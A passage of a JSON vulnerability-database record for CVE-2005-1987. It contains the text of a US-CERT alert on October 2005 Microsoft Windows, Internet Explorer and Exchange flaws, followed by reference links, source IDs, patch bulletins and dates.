vulnerabilities\n in Windows, Internet Explorer, and Exchange Server. \n\nI. Description\n\n Microsoft Security Bulletins for October 2005 address vulnerabilities\n in Windows and Internet Explorer. Further information is available in\n the following US-CERT Vulnerability Notes:\n\n\n VU#214572 - Microsoft Plug and Play fails to properly validate user\n supplied data \n\n Microsoft Plug and Play contains a flaw in the handling of message\n buffers that may result in local or remote arbitrary code execution or\n denial-of-service conditions. \n (CAN-2005-1987)\n\n\n VU#922708 - Microsoft Windows Shell fails to handle shortcut files\n properly \n\n Microsoft Windows Shell does not properly handle some shortcut files\n and may permit arbitrary code execution when a specially-crafted file\n is opened. \n (CAN-2005-0163)\n\nII. An attacker may also be able to cause a\n denial of service. \n\nIII. Solution\n\nApply Updates\n\n Microsoft has provided the updates for these vulnerabilities in the\n Security Bulletins and on the Microsoft Update site. \n\nWorkarounds\n\n Please see the following US-CERT Vulnerability Notes for workarounds. \n\nAppendix A. References\n\n * Microsoft Security Bulletin Summary for October 2005 -\n \u003chttp://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx\u003e\n\n * US-CERT Vulnerability Note VU#214572 -\n \u003chttp://www.kb.cert.org/vuls/id/214572\u003e\n\n * US-CERT Vulnerability Note VU#883460 -\n \u003chttp://www.kb.cert.org/vuls/id/883460\u003e\n\n * US-CERT Vulnerability Note VU#922708 -\n \u003chttp://www.kb.cert.org/vuls/id/922708\u003e\n\n * US-CERT Vulnerability Note VU#995220 -\n \u003chttp://www.kb.cert.org/vuls/id/995220\u003e\n\n * US-CERT Vulnerability Note VU#180868 -\n \u003chttp://www.kb.cert.org/vuls/id/180868\u003e\n\n * US-CERT Vulnerability Note VU#950516 -\n \u003chttp://www.kb.cert.org/vuls/id/950516\u003e\n\n * US-CERT Vulnerability Note VU#959049 -\n \u003chttp://www.kb.cert.org/vuls/id/959049\u003e\n\n * US-CERT Vulnerability Note VU#680526 -\n \u003chttp://www.kb.cert.org/vuls/id/680526\u003e\n\n * CAN-2005-2120 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120\u003e\n\n * CAN-2005-1987 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987\u003e\n\n * CAN-2005-2122 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122\u003e\n\n * CAN-2005-2128 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128\u003e\n\n * CAN-2005-2119 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119\u003e\n\n * CAN-2005-1978 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978\u003e\n\n * CAN-2005-2127 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127\u003e\n\n * CAN-2005-0163 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163\u003e\n\n * Microsoft Update - \u003chttps://update.microsoft.com/microsoftupdate\u003e\n\n\n _________________________________________________________________\n\n The most recent version of this document can be found at:\n\n \u003chttp://www.us-cert.gov/cas/techalerts/TA05-284A.html\u003e \n _________________________________________________________________\n\n Feedback can be directed to US-CERT. Please send email to:\n \u003ccert@cert.org\u003e with \"TA05-284A Feedback VU#959049\" in the subject. \n _________________________________________________________________\n\n Revision History\n\n Oct 11, 2004: Initial release\n _________________________________________________________________\n\n Produced 2005 by US-CERT, a government organization. \n \n Terms of use\n\n \u003chttp://www.us-cert.gov/legal.html\u003e\n _________________________________________________________________\n\n For instructions on subscribing to or unsubscribing from this \n mailing list, visit \u003chttp://www.us-cert.gov/cas/\u003e. \n\n\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niQEVAwUBQ0xBVn0pj593lg50AQJvOQf/QqIy3putm/wkUAUguQaylsCfC38Lysdc\nbqbtj7oF6HEoCzhQguaqQdMGOqa4QJnrObnkHN29xFhYovKWOIYkYsh6c3IXaNLK\nPdImVbcMFNn9VsBNNRVr2dqPXJPvgFFzQKsDcKkknnZyxLf5mshwDJoKFsKDGr9c\n1P9yxwyagQ8G73gTq6hPV/Wl/6zElXH/chlh6haXe6XN9ArTmz8A3OCAN+BZQUqe\n/9T4US8oxLeLlNDcQc/PV5v3VuXXW0v9kjEjqAVEH5tRKH/oIkVdgpj7gdrAzDjM\nMUojHfl1v2/JwWubQ9DFQsBx4Jxv5YvJEREsU7RbVJotn02+Yaaeog==\n=5hXu\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-1987"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#995220"
},
{
"db": "CERT/CC",
"id": "VU#883460"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#950516"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000592"
},
{
"db": "BID",
"id": "15067"
},
{
"db": "PACKETSTORM",
"id": "40623"
},
{
"db": "PACKETSTORM",
"id": "40726"
},
{
"db": "PACKETSTORM",
"id": "40674"
},
{
"db": "PACKETSTORM",
"id": "40619"
}
],
"trust": 6.57
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#883460",
"trust": 3.3
},
{
"db": "NVD",
"id": "CVE-2005-1987",
"trust": 3.0
},
{
"db": "BID",
"id": "15067",
"trust": 2.7
},
{
"db": "USCERT",
"id": "TA05-284A",
"trust": 2.5
},
{
"db": "SECUNIA",
"id": "17167",
"trust": 2.4
},
{
"db": "CERT/CC",
"id": "VU#959049",
"trust": 1.7
},
{
"db": "CERT/CC",
"id": "VU#680526",
"trust": 1.7
},
{
"db": "CERT/CC",
"id": "VU#740372",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#939605",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1015038",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1015039",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "19905",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#995220",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "17161",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#950516",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "16373",
"trust": 0.8
},
{
"db": "BID",
"id": "14594",
"trust": 0.8
},
{
"db": "XF",
"id": "21895",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014727",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "16480",
"trust": 0.8
},
{
"db": "OSVDB",
"id": "19902",
"trust": 0.8
},
{
"db": "XF",
"id": "22473",
"trust": 0.8
},
{
"db": "BID",
"id": "15057",
"trust": 0.8
},
{
"db": "XF",
"id": "21193",
"trust": 0.8
},
{
"db": "BID",
"id": "14087",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "15891",
"trust": 0.8
},
{
"db": "OSVDB",
"id": "17680",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014329",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000592",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200510-082",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "40623",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "40726",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "40674",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#180868",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#214572",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#922708",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "40619",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#995220"
},
{
"db": "CERT/CC",
"id": "VU#883460"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#950516"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "BID",
"id": "15067"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000592"
},
{
"db": "PACKETSTORM",
"id": "40623"
},
{
"db": "PACKETSTORM",
"id": "40726"
},
{
"db": "PACKETSTORM",
"id": "40674"
},
{
"db": "PACKETSTORM",
"id": "40619"
},
{
"db": "CNNVD",
"id": "CNNVD-200510-082"
},
{
"db": "NVD",
"id": "CVE-2005-1987"
}
]
},
"id": "VAR-200510-0005",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-11-29T22:16:41.840000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS05-048",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-048.mspx"
},
{
"title": "MS05-048",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms05-048.mspx"
},
{
"title": "Microsoft Windows and Microsoft Exchange Server Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113625"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2005-000592"
},
{
"db": "CNNVD",
"id": "CNNVD-200510-082"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-1987"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/15067"
},
{
"trust": 2.4,
"url": "http://www.us-cert.gov/cas/techalerts/ta05-284a.html"
},
{
"trust": 2.4,
"url": "http://www.kb.cert.org/vuls/id/883460"
},
{
"trust": 1.6,
"url": "http://www.kb.cert.org/vuls/id/959049"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-052.mspx"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx"
},
{
"trust": 1.6,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1420"
},
{
"trust": 1.6,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1201"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/17167"
},
{
"trust": 1.6,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a848"
},
{
"trust": 1.6,
"url": "http://securitytracker.com/id?1015038"
},
{
"trust": 1.6,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/22495"
},
{
"trust": 1.6,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1515"
},
{
"trust": 1.6,
"url": "http://securitytracker.com/id?1015039"
},
{
"trust": 1.6,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1406"
},
{
"trust": 1.6,
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html"
},
{
"trust": 1.6,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a581"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2"
},
{
"trust": 1.6,
"url": "http://www.osvdb.org/19905"
},
{
"trust": 1.6,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048"
},
{
"trust": 1.6,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1130"
},
{
"trust": 1.0,
"url": "http://support.microsoft.com/default.aspx?scid=kb%3b%5bln%5d%3bq907245"
},
{
"trust": 0.9,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-051.mspx"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/com/default.mspx"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/library/default.asp?url=/workshop/components/activex/activex_node_entry.asp"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/159621"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/216434"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/archive/1/391803"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/939605"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/740372"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-038.mspx"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/16373/"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-050.mspx"
},
{
"trust": 0.8,
"url": "http://eeye.com/html/research/advisories/ad20051011a.html"
},
{
"trust": 0.8,
"url": "about vulnerability notes"
},
{
"trust": 0.8,
"url": "contact us about this vulnerability"
},
{
"trust": 0.8,
"url": "provide a vendor statement"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/906267.mspx"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/680526"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/16480/"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14594"
},
{
"trust": 0.8,
"url": "http://www.securitytracker.com/alerts/2005/aug/1014727.html"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/21895"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/17161"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/15057"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/22473"
},
{
"trust": 0.8,
"url": "http://osvdb.org/displayvuln.php?osvdb_id=19902"
},
{
"trust": 0.8,
"url": "http://www.f-secure.com/weblog/archives/archive-122005.html#00000737"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/903144.mspx"
},
{
"trust": 0.8,
"url": "http://www.sec-consult.com/184.html"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/15891/ "
},
{
"trust": 0.8,
"url": "http://www.securitytracker.com/alerts/2005/jun/1014329.html"
},
{
"trust": 0.8,
"url": "http://www.osvdb.org/displayvuln.php?osvdb_id=17680"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14087"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/21193"
},
{
"trust": 0.8,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33120"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-1987"
},
{
"trust": 0.8,
"url": "http://www.frsirt.com/english/advisories/2005/2045"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta05-284a/"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta05-284a/"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2005-1987"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/17167/"
},
{
"trust": 0.6,
"url": "http://support.microsoft.com/default.aspx?scid=kb;[ln];q907245"
},
{
"trust": 0.5,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-048.mspx"
},
{
"trust": 0.3,
"url": "http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=bltndetail\u0026documentoid=361442\u0026renditionid="
},
{
"trust": 0.3,
"url": "..."
},
{
"trust": 0.3,
"url": "/archive/1/413159"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-1987"
},
{
"trust": 0.2,
"url": "http://www.sec-1.com/applied_hacking_course.html"
},
{
"trust": 0.2,
"url": "http://www.sec-1.com"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org),"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloads/details.aspx?familyid=1ff26142-6e1e-4e17-9dcd-994b339a69cf"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloads/details.aspx?familyid=554a86a5-0b03-4ca9-a32d-642e40570424"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloads/details.aspx?familyid=a6ec1352-042e-4ffb-b379-0e1c06ab9dbe"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/21/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1176/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1177/"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloads/details.aspx?familyid=ca202ccc-792e-4462-9a2f-a20d1f8607f7"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloads/details.aspx?familyid=20f79ce7-d4db-42d7-8e57-58656a3fb2f7"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/22/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1175/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/16/"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloads/details.aspx?familyid=4e5b96d8-ba74-4008-80d9-922364abc6ac"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/20/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1173/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1174/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/17161/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/883460\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-0163"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-1987\u003e"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2119\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-1978\u003e"
},
{
"trust": 0.1,
"url": "https://update.microsoft.com/microsoftupdate\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/\u003e."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-2128"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/180868\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2127\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-2122"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/214572\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-2119"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/959049\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/680526\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2122\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/950516\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-1978"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2128\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-2120"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922708\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-0163\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/995220\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2120\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta05-284a.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/legal.html\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-2127"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#995220"
},
{
"db": "CERT/CC",
"id": "VU#883460"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#950516"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "BID",
"id": "15067"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000592"
},
{
"db": "PACKETSTORM",
"id": "40623"
},
{
"db": "PACKETSTORM",
"id": "40726"
},
{
"db": "PACKETSTORM",
"id": "40674"
},
{
"db": "PACKETSTORM",
"id": "40619"
},
{
"db": "CNNVD",
"id": "CNNVD-200510-082"
},
{
"db": "NVD",
"id": "CVE-2005-1987"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#995220"
},
{
"db": "CERT/CC",
"id": "VU#883460"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#950516"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "BID",
"id": "15067"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000592"
},
{
"db": "PACKETSTORM",
"id": "40623"
},
{
"db": "PACKETSTORM",
"id": "40726"
},
{
"db": "PACKETSTORM",
"id": "40674"
},
{
"db": "PACKETSTORM",
"id": "40619"
},
{
"db": "CNNVD",
"id": "CNNVD-200510-082"
},
{
"db": "NVD",
"id": "CVE-2005-1987"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-08-19T00:00:00",
"db": "CERT/CC",
"id": "VU#680526"
},
{
"date": "2005-10-11T00:00:00",
"db": "CERT/CC",
"id": "VU#995220"
},
{
"date": "2005-10-11T00:00:00",
"db": "CERT/CC",
"id": "VU#883460"
},
{
"date": "2005-08-18T00:00:00",
"db": "CERT/CC",
"id": "VU#740372"
},
{
"date": "2005-10-11T00:00:00",
"db": "CERT/CC",
"id": "VU#950516"
},
{
"date": "2005-07-02T00:00:00",
"db": "CERT/CC",
"id": "VU#939605"
},
{
"date": "2005-10-11T00:00:00",
"db": "BID",
"id": "15067"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2005-000592"
},
{
"date": "2005-10-12T01:58:20",
"db": "PACKETSTORM",
"id": "40623"
},
{
"date": "2005-10-15T00:40:55",
"db": "PACKETSTORM",
"id": "40726"
},
{
"date": "2005-10-12T18:16:30",
"db": "PACKETSTORM",
"id": "40674"
},
{
"date": "2005-10-12T01:55:17",
"db": "PACKETSTORM",
"id": "40619"
},
{
"date": "2005-10-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200510-082"
},
{
"date": "2005-10-13T10:02:00",
"db": "NVD",
"id": "CVE-2005-1987"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-10-11T00:00:00",
"db": "CERT/CC",
"id": "VU#680526"
},
{
"date": "2005-10-14T00:00:00",
"db": "CERT/CC",
"id": "VU#995220"
},
{
"date": "2005-10-14T00:00:00",
"db": "CERT/CC",
"id": "VU#883460"
},
{
"date": "2005-10-13T00:00:00",
"db": "CERT/CC",
"id": "VU#740372"
},
{
"date": "2005-12-15T00:00:00",
"db": "CERT/CC",
"id": "VU#950516"
},
{
"date": "2005-07-12T00:00:00",
"db": "CERT/CC",
"id": "VU#939605"
},
{
"date": "2009-07-12T17:56:00",
"db": "BID",
"id": "15067"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2005-000592"
},
{
"date": "2020-04-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200510-082"
},
{
"date": "2024-11-20T23:58:33.343000",
"db": "NVD",
"id": "CVE-2005-1987"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "40619"
},
{
"db": "CNNVD",
"id": "CNNVD-200510-082"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer can use any COM object",
"sources": [
{
"db": "CERT/CC",
"id": "VU#680526"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200510-082"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.